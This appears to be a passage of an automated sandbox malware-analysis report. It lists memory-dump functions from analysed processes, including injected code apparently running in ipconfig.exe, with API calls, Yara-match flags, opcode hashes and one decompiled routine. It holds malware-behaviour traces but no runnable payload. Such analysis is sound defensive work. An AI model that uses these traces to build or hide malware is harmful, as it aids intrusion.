                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: bdd331c4a0511885c8859a0de7f8e819a7751a551c47572a880c971471788206
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0126FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E0126FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0121CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01265720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01265720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                      0x0126fdda
                                                                      0x0126fde2
                                                                      0x0126fde5
                                                                      0x0126fdec
                                                                      0x0126fdfa
                                                                      0x0126fdff
                                                                      0x0126fe0a
                                                                      0x0126fe0f
                                                                      0x0126fe17
                                                                      0x0126fe1e
                                                                      0x0126fe19
                                                                      0x0126fe19
                                                                      0x0126fe19
                                                                      0x0126fe20
                                                                      0x0126fe21
                                                                      0x0126fe22
                                                                      0x0126fe25
                                                                      0x0126fe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0126FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0126FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0126FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: 2aa95e687a9de298dbe3b8478680446cd18e53ef57ff43445215ea5b5b850161
                                                                      • Instruction ID: 2ff57c96cd1c248c7f6ed9ffc4321a05d3be30cd95c1d1191df8e9cd9ba4eb2b
                                                                      • Opcode Fuzzy Hash: 2aa95e687a9de298dbe3b8478680446cd18e53ef57ff43445215ea5b5b850161
                                                                      • Instruction Fuzzy Hash: 8AF0F632250602BFEB291A45DC42F33BF5EEB54B70F140318F628565D1DA62F87086F4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: ipconfig.exe PID: 6556 Parent PID: 3440 ipconfig.exeCOMMON

                                                                      Executed Functions

                                                                      Function 001281B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00123B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00123B87,007A002E,00000000,00000060,00000000,00000000), ref: 001281FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction ID: 6499158b45e0035caf9f587ed7b919b69fe0ba9e51b031533cc1b611a46256f9
                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction Fuzzy Hash: 50F0B6B2201108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241D630E8118BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001281AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00123B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00123B87,007A002E,00000000,00000060,00000000,00000000), ref: 001281FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 0d27d29b9e2a4bb204cd24bc9c6b15062f0e075be3e4821281b51092670e45de
                                                                      • Instruction ID: f89d01dec6dcf4c81a8b2ef9a2211408c00f974d55adf52232d6b08ccff0b057
                                                                      • Opcode Fuzzy Hash: 0d27d29b9e2a4bb204cd24bc9c6b15062f0e075be3e4821281b51092670e45de
                                                                      • Instruction Fuzzy Hash: 4BF01FB2204149ABCB48DF98DC84CEB77A9BF8C310B14828CFA1D97206D630E851CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00128260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtReadFile.NTDLL(00123D42,5E972F59,FFFFFFFF,00123A01,?,?,00123D42,?,00123A01,FFFFFFFF,5E972F59,00123D42,?,00000000), ref: 001282A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction ID: badd62764bfd0d932eeb41eb106ff8353f283c18e0bb586a8e4ca6d849705513
                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction Fuzzy Hash: AFF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0012825A, Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtReadFile.NTDLL(00123D42,5E972F59,FFFFFFFF,00123A01,?,?,00123D42,?,00123A01,FFFFFFFF,5E972F59,00123D42,?,00000000), ref: 001282A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 923cc57cad8c61623553e420b7921e20bf403dc7a66e21d496952f2080b6b28f
                                                                      • Instruction ID: d5d9f1b69ae81299c2a2e7eb43cf28b9bd282ead57f8bcdb016a21dbcf18f56b
                                                                      • Opcode Fuzzy Hash: 923cc57cad8c61623553e420b7921e20bf403dc7a66e21d496952f2080b6b28f
                                                                      • Instruction Fuzzy Hash: AAF0FFB2200149AFCB14DF98D890CEB77A9FF8C314B15865DFD4D97215CA30E855CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001282E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtClose.NTDLL(00123D20,?,?,00123D20,00000000,FFFFFFFF), ref: 00128305
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction ID: f863bed55615a9cce8faa7257b825d4ae0e8b068d5127fad4b3a2e165901eb70
                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction Fuzzy Hash: 9CD012752002146BD710EFD8DC45ED7775CEF44750F154455BA185B242D930F91086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 83b14f082791d7025347284595b04020980a2a0e1bc3e974ca578e8f52d48cfe
                                                                      • Instruction ID: 3f1233fe2000ba26cb424deec37a90deb4938e430e2c11898de284446a979fb1
                                                                      • Opcode Fuzzy Hash: 83b14f082791d7025347284595b04020980a2a0e1bc3e974ca578e8f52d48cfe
                                                                      • Instruction Fuzzy Hash: D890026221191142D20065694C14B07000597D0353F61D159A4184554CC95588766561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 86796b73a4b2052f5f48309d7b59c8fea9d62b9c342ba9c72b91fab454a32c0c
                                                                      • Instruction ID: 75f72ec40ac898b862aacdc6158cbaed5fc8ad80057a781593b36cadf3026d27
                                                                      • Opcode Fuzzy Hash: 86796b73a4b2052f5f48309d7b59c8fea9d62b9c342ba9c72b91fab454a32c0c
                                                                      • Instruction Fuzzy Hash: 5990027220111513D11161594504707000997D0291FA1D456A4454558D96968967B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ca6c95b0dcd92bb510e43937bd53aef79d96a7a2255360f2b454211f05a5f819
                                                                      • Instruction ID: a3f061c8f1e0f76244809d25694c7ae5a9bc68a8c5b10d8056fcfd8b6dbba43f
                                                                      • Opcode Fuzzy Hash: ca6c95b0dcd92bb510e43937bd53aef79d96a7a2255360f2b454211f05a5f819
                                                                      • Instruction Fuzzy Hash: DB900262242152525545B15944045074006A7E02917A1D056A5444950C8566986BE661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e042d25470e62c4021620fe860434d3dd5c7e6f6600c4042ba29c00aade81be5
                                                                      • Instruction ID: a9d787b0b1d2b3d72bc7a52b623e51b0747deac89a2a443fc291d2a3212579f6
                                                                      • Opcode Fuzzy Hash: e042d25470e62c4021620fe860434d3dd5c7e6f6600c4042ba29c00aade81be5
                                                                      • Instruction Fuzzy Hash: FF9002A234111542D10061594414B070005D7E1351F61D059E5094554D8659CC677166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ed9e57d83f66c19f9a7dec8572d7db8beb45b99db65c33b9aadcaaba3d608d87
                                                                      • Instruction ID: bf31c453c5b765c2858493f6d65881eaa5657eaf2d88b3f337f44fb0f9a2b2a4
                                                                      • Opcode Fuzzy Hash: ed9e57d83f66c19f9a7dec8572d7db8beb45b99db65c33b9aadcaaba3d608d87
                                                                      • Instruction Fuzzy Hash: 379002B220111502D14071594404747000597D0351F61D055A9094554E86998DEA76A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e951113ed2c0612507ff9768b30fa960cb0cc711c01c13464e89aed5d75f7465
                                                                      • Instruction ID: 070759c2f75a25bd9f83fd2d4b9a6a91ba040fcf44b34998b7e1fa207966959c
                                                                      • Opcode Fuzzy Hash: e951113ed2c0612507ff9768b30fa960cb0cc711c01c13464e89aed5d75f7465
                                                                      • Instruction Fuzzy Hash: 5690027220119902D1106159840474B000597D0351F65D455A8454658D86D588A67161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 645ac536f94de3f9d570551c2706a5a5160c566b6c98f4de729ba30bc1b3760f
                                                                      • Instruction ID: ba85c3a4c37e97a008411f6bf2fef71483aaee6816fcf41c93ad16331b9ec661
                                                                      • Opcode Fuzzy Hash: 645ac536f94de3f9d570551c2706a5a5160c566b6c98f4de729ba30bc1b3760f
                                                                      • Instruction Fuzzy Hash: 8F90027220111942D10061594404B47000597E0351F61D05AA4154654D8655C8667561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6ad42e8f947c26eae374903720a74ff57a728c53820eb0835b20e8280280d6b9
                                                                      • Instruction ID: 1aea100b601d5df18febfa62dbdf8fcaa8365e060cb0d3d92b4ec23f7b7f7da0
                                                                      • Opcode Fuzzy Hash: 6ad42e8f947c26eae374903720a74ff57a728c53820eb0835b20e8280280d6b9
                                                                      • Instruction Fuzzy Hash: B590026A21311102D1807159540860B000597D1252FA1E459A4045558CC955887E6361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3457950d30a5c8bd59eea9f37e522605a55869dd50c98339b88c1e7e98923245
                                                                      • Instruction ID: 57572391851b2f27633fb0cd49dbd520aa26872dbe37d71c755d3b42cf3a3286
                                                                      • Opcode Fuzzy Hash: 3457950d30a5c8bd59eea9f37e522605a55869dd50c98339b88c1e7e98923245
                                                                      • Instruction Fuzzy Hash: 6C90027231125502D11061598404707000597D1251F61D455A4854558D86D588A67162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f1d5957ef4953623169c28a8a03d9923d9dbba1f302deefcc48dcbec9d0dc0f1
                                                                      • Instruction ID: d18746bf54b0209895b13222e3137308ca1e50893f624ed6235fd02680cc6957
                                                                      • Opcode Fuzzy Hash: f1d5957ef4953623169c28a8a03d9923d9dbba1f302deefcc48dcbec9d0dc0f1
                                                                      • Instruction Fuzzy Hash: 5890027220111502D10065995408647000597E0351F61E055A9054555EC6A588A67171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bec2c6bcd0a6aba13e415eab568a61847c722c186af71e4d1478de002b08418c
                                                                      • Instruction ID: 1777d51b05d7833f509a142a0a2a3a6bd1c2668c3210c8c143c247e22e8df922
                                                                      • Opcode Fuzzy Hash: bec2c6bcd0a6aba13e415eab568a61847c722c186af71e4d1478de002b08418c
                                                                      • Instruction Fuzzy Hash: A49002A220211103410571594414617400A97E0251B61D065E5044590DC56588A67165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 882aa7852ada9ecc8d8a71882bf208801fecbbc80ba6f878e1203d3d5c60af9a
                                                                      • Instruction ID: 82f17f70930510cccff9b8bcc0d270def00503356d0ba86844ed1572b13c5f8d
                                                                      • Opcode Fuzzy Hash: 882aa7852ada9ecc8d8a71882bf208801fecbbc80ba6f878e1203d3d5c60af9a
                                                                      • Instruction Fuzzy Hash: 47900477311111030105F55D07045070047D7D53F1371D075F5045550CD771CC777171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00126ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 00126F78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 2bd0cf6b713eb471d7167dbc98f1b1573f721bb1252b511e462bcee841536980
                                                                      • Instruction ID: 67880e136812acb038e59fb035610420e6b2273de8189b9f66bf7633162d7ccc
                                                                      • Opcode Fuzzy Hash: 2bd0cf6b713eb471d7167dbc98f1b1573f721bb1252b511e462bcee841536980
                                                                      • Instruction Fuzzy Hash: DD319EB1601704ABC715DFA8E9A1FA7B7B8AF98700F00841DF61A9B281D730B955CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00126EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 00126F78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: a14fa264310eab212456f14e61e4fe6d2f9a928326dce70ad7c6d8917e647bad
                                                                      • Instruction ID: c5e4115aba9516f17d1d2366116185f5d96d4f14853e6a4fcd1ca115c9213b82
                                                                      • Opcode Fuzzy Hash: a14fa264310eab212456f14e61e4fe6d2f9a928326dce70ad7c6d8917e647bad
                                                                      • Instruction Fuzzy Hash: C221D2B1601304ABCB14DFA8E9A1F67B7B4FF48700F10801DF6199B281D774A865CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001284B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00113B93), ref: 001284ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 289143d542d1eabfaa67d2cf307606a16e492e7d096e71be333bec05a26e5450
                                                                      • Instruction ID: f0874cba9defb1b62115b2518b195779c2ab58925170da8dc12aa55bd3f47bd5
                                                                      • Opcode Fuzzy Hash: 289143d542d1eabfaa67d2cf307606a16e492e7d096e71be333bec05a26e5450
                                                                      • Instruction Fuzzy Hash: 27F0EDB0200258ABCB14DFA8CC49EEB3B68EF88314F25448DF9484B242CA30EC14CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001284C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00113B93), ref: 001284ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction ID: 1c20629309dbcdaf8c22ddb6e02fcf8f10e20dd329a6d1be239c54dd7a6b93df
                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction Fuzzy Hash: AEE01AB12002186BDB14DF99DC45EA777ACAF88750F014554BA0857241DA30E9148AF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00117260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001172BA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001172DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 0d48ae8107cc51bb9b2dcdcdaff36038a9ecf63072080ee29a96342c7ecb6ba6
                                                                      • Instruction ID: ca32957d3814886ddb4bb717d5d28e4f9ed62546bdbd24cce8c68c15a5063b90
                                                                      • Opcode Fuzzy Hash: 0d48ae8107cc51bb9b2dcdcdaff36038a9ecf63072080ee29a96342c7ecb6ba6
                                                                      • Instruction Fuzzy Hash: 1101DB31A8022877EB24A6949C03FFE776C5F10B50F550125FF04BA1C2E7A4690647F5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00119B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00119B82
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction ID: 120454e7de6e0da31ffde655f183dd6ff67ddd4cd7286fffe2693b660c9e3cfe
                                                                      • Opcode Fuzzy Hash: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction Fuzzy Hash: BE010CB5D4420DABDF14DAA4EC92FDDB7789B64308F0041A5A91897241F631EB54CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

